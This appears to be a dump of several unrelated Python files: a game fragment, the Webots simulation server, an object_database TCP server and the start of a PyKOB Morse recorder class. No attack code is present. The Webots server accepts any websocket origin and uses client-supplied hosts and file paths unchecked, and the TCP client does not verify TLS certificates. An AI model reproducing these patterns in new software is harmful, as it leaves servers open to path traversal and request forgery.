terminateKeylogger = True # Kill the keylogger so you can type your name
# Its a little buggy, so you have to press enter a few times for the logger to terminate
input("Press enter to continue")
hs[gameMode]["name"] = input("Name: ")
hs[gameMode]["score"] = score
hs_file_w.write(json.dumps(hs, separators=(',', ':')))
hs_file_w.close()
elif hs[gameMode]["score"] == score:
print("lol just one more point and you would have the highscore.")
print("The highscore of " +
str(hs[gameMode]["score"]) + " belongs to " + hs[gameMode]["name"])
else:
print("The highscore of " +
str(hs[gameMode]["score"]) + " belongs to " + hs[gameMode]["name"])
break # Better than sys.exit() or using global variable
time.sleep(1/config["fps"]) # Wait before displaying next frame
|
simulation_server.py
|
#!/usr/bin/env python3
# Copyright 1996-2019 Cyberbotics Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Webots simulation server."""
from io import BytesIO
from pynvml import nvmlInit, nvmlShutdown, nvmlDeviceGetHandleByIndex, nvmlDeviceGetName, nvmlDeviceGetMemoryInfo, \
nvmlDeviceGetUtilizationRates
from requests import session
import asyncio
import errno
import json
import logging
import os
import platform
import psutil
import re
import shutil
import subprocess
import sys
import tempfile
import time
import threading
import tornado.ioloop
import tornado.httpserver
import tornado.web
import tornado.websocket
import traceback
import socket
import zipfile
if sys.platform == 'win32':
import wmi
SNAPSHOT_REFRESH = 1 # make a performance measurement every second
network_sent = 0
network_received = 0
def expand_path(path):
"""Expand user and environmental variables in a string."""
return os.path.expandvars(os.path.expanduser(path))
def mkdir_p(path):
"""Create a directory if it doesn't exit."""
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def chmod_python_and_executable_files(directory):
"""Add executable permissions to Python and executable files."""
if sys.platform == 'win32':
return
for filename in os.listdir(directory):
fullname = os.path.join(directory, filename)
if os.path.isdir(fullname):
chmod_python_and_executable_files(fullname)
if filename.endswith('.py') or not os.path.splitext(filename)[1]:
os.chmod(fullname, 0o775)
class Snapshot:
"""This class stores instantaneous monitoring information on the machine."""
def __init__(self):
"""Create an empty instance of MonitorSnapshot."""
self.data = {'Timestamp': 0,
'Webots running': 0,
'Webots idle': 0,
'CPU load': 0,
'CPU memory': 0,
'GPU load compute': 0,
'GPU load memory': 0,
'GPU memory': 0,
'Swap': 0,
'Disk': 0,
'Network sent': 0,
'Network received': 0}
def write(self):
"""Save a snapshot into a file."""
if not config['monitorLogEnabled']:
return
global monitorFile
file = open(monitorFile, 'a')
file.write(str(self.data['Timestamp']) + ", ")
file.write(str(self.data['Webots running']) + ", ")
file.write(str(self.data['Webots idle']) + ", ")
file.write(str(self.data['CPU load']) + ", ")
file.write(str(self.data['CPU memory']) + ", ")
file.write(str(self.data['GPU load compute']) + ", ")
file.write(str(self.data['GPU load memory']) + ", ")
file.write(str(self.data['GPU memory']) + ", ")
file.write(str(self.data['Swap']) + ", ")
file.write(str(self.data['Disk']) + ", ")
file.write(str(self.data['Network sent']) + ", ")
file.write(str(self.data['Network received']) + "\n")
file.close()
class Client:
"""This class represents an instance of connected client."""
def __init__(self, client_websocket=None):
"""Create an instance of client."""
self.client_websocket = client_websocket
self.streaming_server_port = 0
self.webots_process = None
self.on_webots_quit = None
self.project_instance_path = ''
self.app = ''
self.world = ''
self.idle = True
def __del__(self):
"""Destroy an instance of client."""
if self.client_websocket:
self.client_websocket.close()
self.kill_webots()
self.cleanup_webots_instance()
def prepare_webots_instance(self):
"""Setup a local Webots project to be run by the client."""
appPath = config['projectsDir'] + '/' + self.app + '/'
self.project_instance_path = config['instancesPath'] + str(id(self))
shutil.copytree(appPath, self.project_instance_path)
hostFile = open(self.project_instance_path + "/host.txt", 'w')
hostFile.write(self.host)
hostFile.close()
if self.user1Id:
payload = {'project': self.app, 'key': self.key,
'user1Id': self.user1Id, 'user1Name': self.user1Name, 'user1Authentication': self.user1Authentication,
'user2Id': self.user2Id, 'user2Name': self.user2Name, 'customData': self.customData}
with session() as c:
response = c.post(self.host + '/ajax/download-project.php', data=payload)
if response.content.startswith(b'Error:'):
error = response.content.decode('utf-8')
if error.startswith('Error: no such directory: '):
return True # Use the default directory instead
logging.error("Failed to download project: " + error + "(host = " + self.host + ")")
return False
fp = BytesIO(response.content)
try:
zfp = zipfile.ZipFile(fp, 'r')
zfp.extractall(self.project_instance_path)
except zipfile.BadZipfile:
logging.error("Bad ZIP file:\n" + response.content.decode('utf-8'))
return False
chmod_python_and_executable_files(self.project_instance_path)
return True
def cleanup_webots_instance(self):
"""Cleanup the local Webots project not used any more by the client."""
if self.project_instance_path:
shutil.rmtree(self.project_instance_path)
def start_webots(self, on_webots_quit):
"""Start a Webots instance in a separate thread."""
def runWebotsInThread(client):
global config
world = self.project_instance_path + '/worlds/' + self.world
port = client.streaming_server_port
command = config['webots'] + ' --batch --mode=pause --minimize '
command += '--stream="port=' + str(port) + ';monitorActivity'
if self.user1Authentication or not self.user1Id: # we are running our own or an anonymous simulation
command += ';controllerEdit'
if 'multimediaServer' in config:
command += ';multimediaServer=' + config['multimediaServer']
if 'multimediaStream' in config:
command += ';multimediaStream=' + config['multimediaStream']
if config['ssl']:
command += ';ssl'
command += '" ' + world
try:
client.webots_process = subprocess.Popen(command.split(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
bufsize=1, universal_newlines=True)
except Exception:
logging.error('Unable to start Webots: ' + command)
return
logging.info('[%d] Webots [%d] started: "%s"' % (id(client), client.webots_process.pid, command))
while 1:
if client.webots_process is None:
# client connection closed or killed
return
line = client.webots_process.stdout.readline().rstrip()
if line.startswith('open'): # Webots world is loaded, ready to receive connections
break
hostname = client.client_websocket.request.host.split(':')[0]
if config['ssl']:
protocol = 'wss:'
else:
protocol = 'ws:'
asyncio.set_event_loop(asyncio.new_event_loop())
client.client_websocket.write_message('webots:' + protocol + '//' +
hostname + ':' + str(port))
for line in iter(client.webots_process.stdout.readline, b''):
line = line.rstrip()
if line == 'pause':
client.idle = True
elif line == 'real-time' or line == 'step':
client.idle = False
elif line == '.':
client.client_websocket.write_message('.')
client.on_exit()
if self.prepare_webots_instance():
self.on_webots_quit = on_webots_quit
threading.Thread(target=runWebotsInThread, args=(self,)).start()
else:
on_webots_quit()
def on_exit(self):
"""Callback issued when Webots quits."""
if self.webots_process:
logging.warning('[%d] Webots [%d] exited' % (id(self), self.webots_process.pid))
self.webots_process.wait()
self.webots_process = None
self.on_webots_quit()
def kill_webots(self):
"""Force the termination of Webots."""
if self.webots_process:
logging.warning('[%d] Webots [%d] was killed' % (id(self), self.webots_process.pid))
self.webots_process.terminate()
self.webots_process.wait()
self.webots_process = None
if sys.platform == 'darwin' and self.webots_process:
self.webots_process.kill()
class ClientWebSocketHandler(tornado.websocket.WebSocketHandler):
"""This class handles websocket connections."""
clients = set()
def check_origin(self, origin):
"""Allow to run the server on the same computer as the client."""
return True
@classmethod
def find_client_from_websocket(cls, client_websocket):
"""Return client associated with a websocket."""
for client in cls.clients:
if client.client_websocket == client_websocket:
return client
return None
@classmethod
def next_available_port(cls):
"""Return a port number available for a new Webots WebSocket server."""
port = config['port'] + 1
while True:
found = False
for client in cls.clients:
if port == client.streaming_server_port:
found = True
break
if found:
port += 1
else:
return port
def open(self):
"""Open a new connection for an incoming client."""
self.set_nodelay(True)
logging.info(self.request.host)
client = Client(client_websocket=self)
ClientWebSocketHandler.clients.add(client)
logging.info('[%d] New client' % (id(client),))
def on_close(self):
"""Close connection after client leaves."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client:
logging.info('[%d] Client disconnected' % (id(client),))
client.kill_webots()
if client in ClientWebSocketHandler.clients:
ClientWebSocketHandler.clients.remove(client)
del client
def on_message(self, message):
"""Receive message from client."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client:
data = json.loads(message)
if 'init' in data:
# setup client
client.streaming_server_port = ClientWebSocketHandler.next_available_port()
logging.info('data[init]=%s' % data['init'])
client.host = data['init'][0]
client.app = data['init'][1]
client.world = data['init'][2]
client.user1Id = data['init'][3]
client.user1Name = data['init'][4]
client.user1Authentication = data['init'][5]
client.user2Id = data['init'][6]
client.user2Name = data['init'][7]
client.customData = data['init'][8]
client.idle = True
# Check that client.host is allowed
if client.host.startswith('https://'):
host = client.host[8:]
else: # assuming 'http://'
host = client.host[7:]
n = host.find(':')
if n > 0:
host = host[:n]
keyFilename = os.path.join(config['keyDir'], host)
if (os.path.isfile(keyFilename)):
try:
keyFile = open(keyFilename, "r")
except IOError:
logging.error("Unknown host: " + host + " from " + self.request.remote_ip)
client.client_websocket.close()
return
client.key = keyFile.readline().rstrip(os.linesep)
else:
logging.warning("No key for: " + host)
logging.info('[%d] Setup client %s %s '
'(remote ip: %s, streaming_server_port: %s)'
% (id(client),
client.app,
client.world,
self.request.remote_ip,
client.streaming_server_port))
self.start_client()
elif "reset controller" in data:
relativeFilename = '/controllers/' + data['reset controller']
shutil.copyfile(config['projectsDir'] + '/' + client.app + relativeFilename,
client.project_instance_path + '/' + relativeFilename)
self.write_message('reset controller: ' + data['reset controller'])
logging.info('[%d] Reset file %s '
'(remote ip: %s, streaming_server_port: %s)'
% (id(client),
data['reset controller'],
self.request.remote_ip,
client.streaming_server_port))
def on_webots_quit(self):
"""Cleanup websocket connection."""
client = ClientWebSocketHandler.find_client_from_websocket(self)
if client and client.client_websocket:
client.client_websocket.close()
def start_client(self):
"""Start Webots."""
# let 10 seconds to start Webots
self.last_supervisor_activity = None
client = ClientWebSocketHandler.find_client_from_websocket(self)
client.start_webots(self.on_webots_quit)
class LoadHandler(tornado.web.RequestHandler):
"""Handle load requests."""
def get(self):
"""Return the current load of the simulation server."""
global current_load
self.write(str(current_load))
class MonitorHandler(tornado.web.RequestHandler):
"""Display the monitor web page."""
global config
global snapshots
global nvidia
def get(self):
"""Write the web page content."""
global cpu_load
global gpu_load_compute
global gpu_load_memory
memory = psutil.virtual_memory()
swap = psutil.swap_memory()
if nvidia:
nvmlHandle = nvmlDeviceGetHandleByIndex(0)
gpu = str(nvmlDeviceGetName(nvmlHandle))
gpu_memory = nvmlDeviceGetMemoryInfo(nvmlHandle)
gpu_ram = gpu_memory.total / (1024 * 1048576)
gpu += " - " + str(gpu_ram) + "GB"
else:
gpu = "Not recognized"
ram = str(int(round(float(memory.total) / (1024 * 1048576)))) + "GB"
ram += " (swap: " + str(int(round(float(swap.total) / (1024 * 1048576)))) + "GB)"
real_cores = psutil.cpu_count(False)
cores_ratio = psutil.cpu_count(True) / real_cores
cores = " (" + str(cores_ratio) + "x " + str(real_cores) + " cores)"
if re.search("^linux\\d?$", sys.platform): # python2: 'linux2' or 'linux3', python3: 'linux'
distribution = platform.linux_distribution()
os_name = 'Linux ' + distribution[0] + " " + distribution[1] + " " + distribution[2]
command = "cat /proc/cpuinfo"
all_info = str(subprocess.check_output(command, shell=True).strip())
for line in all_info.split("\n"):
if "model name" in line:
cpu = re.sub(".*model name.*:", "", line, 1)
break
elif sys.platform == 'win32':
computer = wmi.WMI()
os_info = computer.Win32_OperatingSystem()[0]
cpu = computer.Win32_Processor()[0].Name
os_name = os_info.Name.encode('utf-8').split('|')[0] + ", version "
os_name += os_info.Version
elif sys.platform == 'darwin':
os_name = 'macOS ' + platform.mac_ver()[0]
os.environ['PATH'] = os.environ['PATH'] + os.pathsep + '/usr/sbin'
command = 'sysctl -n machdep.cpu.brand_string'
cpu = subprocess.check_output(command).strip()
else: # unknown platform
os_name = 'Unknown'
cpu = 'Unknown'
self.write("<!DOCTYPE html>\n")
self.write("<html><head><meta charset='utf-8'/><title>Webots simulation server</title>")
self.write("<link rel='stylesheet' type='text/css' href='css/monitor.css'></head>\n")
self.write("<body><h1>Webots simulation server: " + socket.getfqdn() + "</h1>")
self.write("<h2>Host: " + os_name + "</h2>\n")
self.write("<p><b>CPU load: %g%%</b><br>\n" % cpu_load)
self.write(cpu + cores + "</p>\n")
self.write("<p><b>GPU load compute: %g%% — load memory: %g%%</b><br>\n" %
(gpu_load_compute, gpu_load_memory))
self.write(gpu + "</p>\n")
self.write("<p><b>RAM:</b><br>" + ram + "</p>\n")
self.write("<canvas id='graph' height='400' width='1024'></canvas>\n")
self.write("<script src='https://www.cyberbotics.com/harry-plotter/0.9f/harry.min.js'></script>\n")
self.write("<script>\n")
self.write("window.onload = function() {\n")
def appendData(label):
global snapshots
d = "{title:'" + label + "',values:["
for s in snapshots:
d += str(s.data[label]) + ','
return d[:-1] + "]},"
datas = ''
datas += appendData('Webots running')
datas += appendData('Webots idle')
datas += appendData('CPU load')
datas += appendData('CPU memory')
datas += appendData('GPU load compute')
datas += appendData('GPU load memory')
datas += appendData('GPU memory')
datas += appendData('Swap')
datas += appendData('Disk')
datas += appendData('Network sent')
datas += appendData('Network received')
datas = datas[:-1] # remove the last coma
self.write(" plotter({\n")
self.write(" canvas: 'graph',\n")
self.write(" datas:[ " + datas + "],\n")
self.write("""
labels:{
ypos:"left",
x:100,
y:[50,100],
marks:2
},
fill:"none",
opacity:0.5,
linewidth:3,
background:"#fff",
autoscale:"top",
grid:{
x:[0,100]
},
mouseover:{
radius:4,
linewidth:2,
bullet:"#444",
shadowbox:"1,1,0,#000",
axis:"x"
}
});""")
self.write("}\n")
self.write("</script>\n")
self.write("</body></html>")
def update_snapshot():
"""Compute a monitoring snapshot."""
global current_load
global network_sent
global network_received
global cpu_load
global gpu_load_compute
global gpu_load_memory
memory = psutil.virtual_memory()
swap = psutil.swap_memory()
disk = psutil.disk_usage('/')
n = psutil.net_io_counters()
new_network_sent = n.bytes_sent
new_network_received = n.bytes_recv
network_sent_rate = float(new_network_sent - network_sent) / (SNAPSHOT_REFRESH * 1000000) # expressed in MB/s
network_received_rate = float(new_network_received - network_received) / (SNAPSHOT_REFRESH * 1000000) # MB/s
network_sent = new_network_sent
network_received = new_network_received
global nvidia
if nvidia:
nvmlHandle = nvmlDeviceGetHandleByIndex(0)
gpu_memory = nvmlDeviceGetMemoryInfo(nvmlHandle)
gpu_ram_usage = round(100 * float(gpu_memory.used) / float(gpu_memory.total), 1)
else: # not supported
nvmlHandle = 0
gpu_ram_usage = 0
cpu_load = psutil.cpu_percent()
try:
gpu_load = nvmlDeviceGetUtilizationRates(nvmlHandle)
gpu_load_compute = gpu_load.gpu
gpu_load_memory = gpu_load.memory
except: # not supported on some hardware
gpu_load_compute = 0
gpu_load_memory = 0
webots_idle = 0
webots_running = 0
for client in ClientWebSocketHandler.clients:
if client.idle:
webots_idle = webots_idle + 1
else:
webots_running = webots_running + 1
snapshot = Snapshot()
snapshot.data['Timestamp'] = int(time.time())
snapshot.data['Webots running'] = webots_running
snapshot.data['Webots idle'] = webots_idle
snapshot.data['CPU load'] = cpu_load
snapshot.data['CPU memory'] = memory.percent
snapshot.data['GPU load compute'] = gpu_load_compute
snapshot.data['GPU load memory'] = gpu_load_memory
snapshot.data['GPU memory'] = gpu_ram_usage
snapshot.data['Swap'] = swap.percent
snapshot.data['Disk'] = disk.percent
snapshot.data['Network sent'] = network_sent_rate
snapshot.data['Network received'] = network_received_rate
snapshot.write()
current_load = 0
for key, value in snapshot.data.items():
if key == 'Timestamp':
continue
if value > current_load:
current_load = value
snapshots.append(snapshot)
if len(snapshots) > 600: # display data for the last 10 minutes
del snapshots[0]
tornado.ioloop.IOLoop.current().add_timeout(int(time.time()) + SNAPSHOT_REFRESH, update_snapshot)
def main():
"""Start the simulation server."""
# the following config variables read from the config.json file
# are described here:
#
# port: local port on which the server is listening (launching webots instances).
# sslKey: private key for a SSL enabled server.
# sslCertificate: certificate for a SSL enabled server.
# projectsDir: directory in which projects are located.
# keyDir: directory where the host keys needed for validation are stored.
# logDir: directory where the log files are written.
# monitorLogEnabled: specify if the monitor data have to be stored in a file.
#
global config
global snapshots
global nvidia
global network_sent
global network_received
global monitorFile
n = psutil.net_io_counters()
network_sent = n.bytes_sent
network_received = n.bytes_recv
snapshots = []
config['WEBOTS_HOME'] = os.getenv('WEBOTS_HOME', '../../..').replace('\\', '/')
config['webots'] = config['WEBOTS_HOME']
if sys.platform == 'darwin':
config['webots'] += '/Contents/MacOS/webots'
elif sys.platform == 'win32':
config['webots'] += '/msys64/mingw64/bin/webots.exe'
else: # linux
config['webots'] += '/webots'
if 'projectsDir' not in config:
config['projectsDir'] = config['WEBOTS_HOME'] + '/projects/samples/robotbenchmark'
else:
config['projectsDir'] = expand_path(config['projectsDir'])
if 'keyDir' not in config:
config['keyDir'] = 'key'
else:
config['keyDir'] = expand_path(config['keyDir'])
if 'port' not in config:
config['port'] = 2000
os.environ['WEBOTS_FIREJAIL_CONTROLLERS'] = '1'
config['instancesPath'] = tempfile.gettempdir().replace('\\', '/') + '/webots/instances/'
# create the instances path
if os.path.exists(config['instancesPath']):
shutil.rmtree(config['instancesPath'])
mkdir_p(config['instancesPath'])
# logging system
log_formatter = logging.Formatter('%(asctime)-15s [%(levelname)-7s] %(message)s')
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
if 'logDir' not in config:
config['logDir'] = 'log'
else:
config['logDir'] = expand_path(config['logDir'])
simulationLogDir = os.path.join(config['logDir'], 'simulation')
logFile = os.path.join(simulationLogDir, 'output.log')
try:
if not os.path.exists(simulationLogDir):
os.makedirs(simulationLogDir)
file_handler = logging.FileHandler(logFile)
file_handler.setFormatter(log_formatter)
file_handler.setLevel(logging.INFO)
root_logger.addHandler(file_handler)
except (OSError, IOError) as e:
sys.exit("Log file '" + logFile + "' cannot be created: " + str(e))
# create monitor.csv used by Snapshot if needed
if 'monitorLogEnabled' not in config:
config['monitorLogEnabled'] = True
if config['monitorLogEnabled']:
monitorFile = os.path.join(simulationLogDir, 'monitor.csv')
try:
if not os.path.exists(simulationLogDir):
os.makedirs(simulationLogDir)
file = open(monitorFile, 'w')
file.write("Timestamp, Webots running, Webots idle, CPU load, CPU memory, "
"GPU load compute, GPU load memory, GPU memory, Swap, Disk, Network sent, Network received\n")
file.close()
except (OSError, IOError) as e:
logging.error("Log file '" + monitorFile + "' cannot be created: " + str(e))
# startup janus server if needed
if 'multimediaServer' in config:
subprocess.Popen(["/opt/janus/bin/janus"])
# startup the server
logging.info("Running simulation server on port %d" % config['port'])
handlers = []
handlers.append((r'/monitor', MonitorHandler))
handlers.append((r'/client', ClientWebSocketHandler))
handlers.append((r'/load', LoadHandler))
handlers.append((r'/(.*)', tornado.web.StaticFileHandler,
{'path': config['WEBOTS_HOME'] + '/resources/web/server/www',
'default_filename': 'index.html'}))
application = tornado.web.Application(handlers)
if 'sslCertificate' in config and 'sslKey' in config:
config['ssl'] = True
ssl_certificate = os.path.abspath(expand_path(config['sslCertificate']))
ssl_key = os.path.abspath(expand_path(config['sslKey']))
ssl_options = {"certfile": ssl_certificate, "keyfile": ssl_key}
http_server = tornado.httpserver.HTTPServer(application, ssl_options=ssl_options)
else:
config['ssl'] = False
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(config['port'])
message = "Simulation server running on port %d (" % config['port']
if not config['ssl']:
message += 'no '
message += 'SSL)'
print(message)
sys.stdout.flush()
try:
nvmlInit()
nvidia = True
except:
nvidia = False
update_snapshot()
try:
tornado.ioloop.IOLoop.current().start()
except Exception:
logging.info(traceback.format_exc())
for client in ClientWebSocketHandler.clients:
del client
if nvidia:
nvmlShutdown()
if sys.platform == 'linux2':
# kill all the existing instances of Webots to avoid conflicts with web socket port
os.system("killall -q webots-bin")
# specify the display to ensure Webots can be executed even if this script is started remotely from a ssh session
os.environ["DISPLAY"] = ":0"
# ensure we are in the script directory
os.chdir(os.path.dirname(os.path.realpath(__file__)))
argc = len(sys.argv)
if argc == 1:
config_json = 'config/simulation/default.json'
elif argc == 2:
config_json = sys.argv[1]
else:
sys.exit('Too many arguments.')
with open(config_json) as config_file:
config = json.load(config_file)
if __name__ == '__main__':
main()
|
tcp_server.py
|
from object_database.database_connection import DatabaseConnection
from object_database.server import Server
from object_database.messages import ClientToServer, ServerToClient, getHeartbeatInterval
from object_database.algebraic_protocol import AlgebraicProtocol
from object_database.persistence import InMemoryPersistence
import asyncio
import logging
import ssl
import time
import threading
import socket
import traceback
class ServerToClientProtocol(AlgebraicProtocol):
def __init__(self, dbserver, loop):
AlgebraicProtocol.__init__(self, ClientToServer, ServerToClient)
self.dbserver = dbserver
self.loop = loop
self.connectionIsDead = False
self._logger = logging.getLogger(__name__)
def setClientToServerHandler(self, handler):
def callHandler(*args):
try:
return handler(*args)
except Exception:
self._logger.error("Unexpected exception in %s:\n%s", handler.__name__, traceback.format_exc())
self.handler = callHandler
def messageReceived(self, msg):
self.handler(msg)
def onConnected(self):
self.dbserver.addConnection(self)
def write(self, msg):
if not self.connectionIsDead:
self.loop.call_soon_threadsafe(self.sendMessage, msg)
def connection_lost(self, e):
self.connectionIsDead = True
_eventLoop.loop.call_later(0.01, self.completeDropConnection)
def completeDropConnection(self):
self.dbserver.dropConnection(self)
def close(self):
self.connectionIsDead = True
self.transport.close()
class ClientToServerProtocol(AlgebraicProtocol):
def __init__(self, host, port, eventLoop):
AlgebraicProtocol.__init__(self, ServerToClient, ClientToServer)
self.loop = eventLoop
self.lock = threading.Lock()
self.host = host
self.port = port
self.handler = None
self.msgs = []
self.disconnected = False
self._stopHeartbeatingSet = False
self._logger = logging.getLogger(__name__)
def _stopHeartbeating(self):
self._stopHeartbeatingSet = True
def setServerToClientHandler(self, handler):
with self.lock:
def callHandler(*args):
try:
return handler(*args)
except Exception:
self._logger.error("Unexpected exception in %s:\n%s", handler.__name__, traceback.format_exc())
self.handler = callHandler
for m in self.msgs:
self.loop.call_soon_threadsafe(self.handler, m)
self.msgs = None
def messageReceived(self, msg):
with self.lock:
if not self.handler:
self.msgs.append(msg)
else:
self.loop.call_soon_threadsafe(self.handler, msg)
def onConnected(self):
self.loop.call_later(getHeartbeatInterval(), self.heartbeat)
def heartbeat(self):
if not self.disconnected and not self._stopHeartbeatingSet:
self.sendMessage(ClientToServer.Heartbeat())
self.loop.call_later(getHeartbeatInterval(), self.heartbeat)
def close(self):
self.loop.call_soon_threadsafe(self._close)
def _close(self):
self.disconnected = True
self.transport.close()
def connection_lost(self, e):
self.disconnected = True
self.messageReceived(ServerToClient.Disconnected())
def write(self, msg):
self.loop.call_soon_threadsafe(self.sendMessage, msg)
class EventLoopInThread:
def __init__(self):
self.loop = asyncio.new_event_loop()
self.thread = threading.Thread(target=self.runEventLoop)
self.thread.daemon = True
self.started = False
def runEventLoop(self):
asyncio.set_event_loop(self.loop)
self.loop.run_forever()
def start(self):
if not self.started:
self.started = True
self.thread.start()
def create_connection(self, protocol_factory, host, port, ssl):
self.start()
async def doit():
return await self.loop.create_connection(protocol_factory, host=host, port=port, family=socket.AF_INET, ssl=ssl)
res = asyncio.run_coroutine_threadsafe(doit(), self.loop)
return res.result(10)
def create_server(self, protocol_factory, host, port, ssl):
self.start()
async def doit():
return await self.loop.create_server(protocol_factory, host=host, port=port, family=socket.AF_INET, ssl=ssl)
res = asyncio.run_coroutine_threadsafe(doit(), self.loop)
return res.result(10)
_eventLoop = EventLoopInThread()
def connect(host, port, auth_token, timeout=10.0, retry=False, eventLoop=_eventLoop):
t0 = time.time()
# With CLIENT_AUTH we are setting up the SSL to use encryption only, which is what we want.
# If we also wanted authentication, we would use SERVER_AUTH.
ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
proto = None
while proto is None:
try:
_, proto = eventLoop.create_connection(
lambda: ClientToServerProtocol(host, port, eventLoop.loop),
host=host,
port=port,
ssl=ssl_ctx
)
except Exception:
if not retry or time.time() - t0 > timeout * .8:
raise
time.sleep(min(timeout, max(timeout / 100.0, 0.01)))
if proto is None:
raise ConnectionRefusedError()
conn = DatabaseConnection(proto)
conn.authenticate(auth_token)
conn.initialized.wait(timeout=max(timeout - (time.time() - t0), 0.0))
assert conn.initialized.is_set()
return conn
_eventLoop2 = []
class TcpServer(Server):
def __init__(self, host, port, mem_store, ssl_context, auth_token):
Server.__init__(self, mem_store or InMemoryPersistence(), auth_token)
self.mem_store = mem_store
self.host = host
self.port = port
self.ssl_ctx = ssl_context
self.socket_server = None
self.stopped = False
def start(self):
Server.start(self)
self.socket_server = _eventLoop.create_server(
lambda: ServerToClientProtocol(self, _eventLoop.loop),
host=self.host,
port=self.port,
ssl=self.ssl_ctx
)
_eventLoop.loop.call_soon_threadsafe(self.checkHeartbeatsCallback)
def checkHeartbeatsCallback(self):
if not self.stopped:
_eventLoop.loop.call_later(getHeartbeatInterval(), self.checkHeartbeatsCallback)
try:
self.checkForDeadConnections()
except Exception:
logging.error("Caught exception in checkForDeadConnections:\n%s", traceback.format_exc())
def stop(self):
Server.stop(self)
self.stopped = True
if self.socket_server:
self.socket_server.close()
def connect(self, auth_token, useSecondaryLoop=False):
if useSecondaryLoop:
if not _eventLoop2:
_eventLoop2.append(EventLoopInThread())
loop = _eventLoop2[0]
else:
loop = _eventLoop
return connect(self.host, self.port, auth_token, eventLoop=loop)
def __enter__(self):
self.start()
return self
def __exit__(self, t, v, traceback):
self.stop()
|
recorder.py
|
"""
MIT License
Copyright (c) 2020 PyKOB - MorseKOB in Python
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
"""
Recorder class
Records wire and local station information for analysis and playback.
Plays back recorded information.
The information is recorded in packets in a JSON structure that includes:
1. Timestamp
2. Source (`local`/`wire`)
3. Station ID
4. Wire Number
5. Code type
6. The decoded character
7. Code Sequence (key timing information)
Though the name of the class is `recorder` it is typical that a 'recorder' can also
play back. For example, a 'tape recorder', a 'video casset recorder (VCR)',
a 'digital video recorder' (DVR), etc. can all play back what they (and compatible
devices) have recorded. This class is no exception. It provides methods to play back
recordings in addition to making recordings.
"""
import json
import queue
import threading
import time
from datetime import datetime, timedelta
from enum import Enum, IntEnum, unique
from pykob import config, kob, log
from threading import Lock, RLock
@unique
class PlaybackState(IntEnum):
"""
The current state of recording playback.
"""
idle = 0
playing = 1
paused = 2
def get_timestamp() -> int:
"""
Return the current millisecond timestamp.
Return
------
ts : number
milliseconds since the epoc
"""
ts = int(time.time() * 1000)
return ts
def date_time_from_ts(ts: int) -> str:
"""
Return a Date-Time string from a timestamp.
ts : int
milliseconds since the epec
Return
------
dtstr : string
A string with the date and time
"""
dateTime = datetime.fromtimestamp(ts / 1000.0)
dateTimeStr = str(dateTime.ctime()) + ": "
return dateTimeStr
def hms_from_ts(ts1: int, ts2: int) -> str:
"""
Return a string with HH:MM:SS from a pair of timestamp values.
ts1 : int
Timestamp 1
ts2 : int
Timestamp 2
Return
------
hms : string
A string in the form HH:MM:SS calculated from the two timestamps.
"""
duration = abs(ts1 - ts2)
tdelta = timedelta(milliseconds=duration)
return str(tdelta)
class Recorder:
"""
Recorder class provides functionality to record and playback a code stream.
"""
def __init__(self, target_file_path:str=None, source_file_path:str=None, \
station_id:str="", wire:int=-1, \
play_code_callback=None, \
play_finished_callback=None, \
play_sender_id_callback=None, \
play_wire_callback=None, \
play_station_list_callback=None):
self.__target_file_path = target_file_path
self.__source_file_path = source_file_path
self.__recorder_station_id = station_id
self.__recorder_wire = wire
self.__player_station_id = None
self.__player_wire = 0
self.__play_code_callback = play_code_callback
self.__play_finished_callback = play_finished_callback
self.__play_sender_id_callback = play_sender_id_callback
self.__play_station_list_callback = play_station_list_callback
self.__play_wire_callback = play_wire_callback
self.__playback_state = PlaybackState.idle
self.__playback_thread = None
self.__p_stations_thread = None
self.__playback_resume_flag = threading.Event()
self.__playback_stop_flag = threading.Event()
self.__playback_code = None
self.__list_data = False
self.__max_silence = 0
self.__speed_factor = 100
# Information about the current playback file
self.__p_line_no = 0 # Current line number being processed/played
self.__p_lines = 0 # Number of lines in the file
self.__p_fts = 0 # First (earliest) timestamp
self.__p_lts = 0 # Last (latest) timestamp
self.__p_fpts_index = [] # List of tuples with timestamp, file-position and station-change
self.__p_stations = set() # Set of all stations in the recording
self.__p_fp = None # File pointer for current playback file while playing
self.__p_pblts = -1 # Playback last timestamp
self.__p_fileop_lock = Lock() # Lock to protect file operation access from play and seek threads
@property
def playback_stations(self):
"""
Set of the stations contained in the recording being played.
"""
return self.__p_stations
@property
def playback_state(self):
"""
The current PlaybackState.
"""
return self.__playback_state
@property
def source_file_path(self) -> str:
"""
The path to the source file used to play back a code sequence stored in PyKOB JSON format.
"""
return self.__source_file_path
@source_file_path.setter
def source_file_path(self, path: str):
"""
Set the source file path.
"""
self.__source_file_path = path
@property
def target_file_path(self) -> str:
"""
The path to the target file used to record a code sequence in PyKOB JSON format.
"""
return self.__target_file_path
@target_file_path.setter
def target_file_path(self, target_file_path: str):
"""
